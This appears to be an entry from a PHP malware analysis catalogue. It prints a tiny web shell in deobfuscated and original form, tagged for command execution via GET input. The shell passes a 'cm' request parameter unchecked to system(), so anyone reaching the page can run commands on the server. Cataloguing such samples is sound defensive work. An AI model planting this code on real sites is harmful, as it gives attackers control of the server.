PHP Malware Analysis

Back to list

Tags

Execution
system
Input
_GET

Deobfuscated code




<?php 
echo "<form method=\"get\">\r\n<input type=\"text\" name=\"cm\">\r\n<button type=\"submit\">Submit</button>\r\n</form>";
if (isset($_GET['cm'])) {
    echo system($_GET['cm']);
}

Original code




<?php


echo '<form method="get">
<input type="text" name="cm">
<button type="submit">Submit</button>
</form>';




if (isset($_GET['cm'])) {
    echo system($_GET['cm']);
}
?>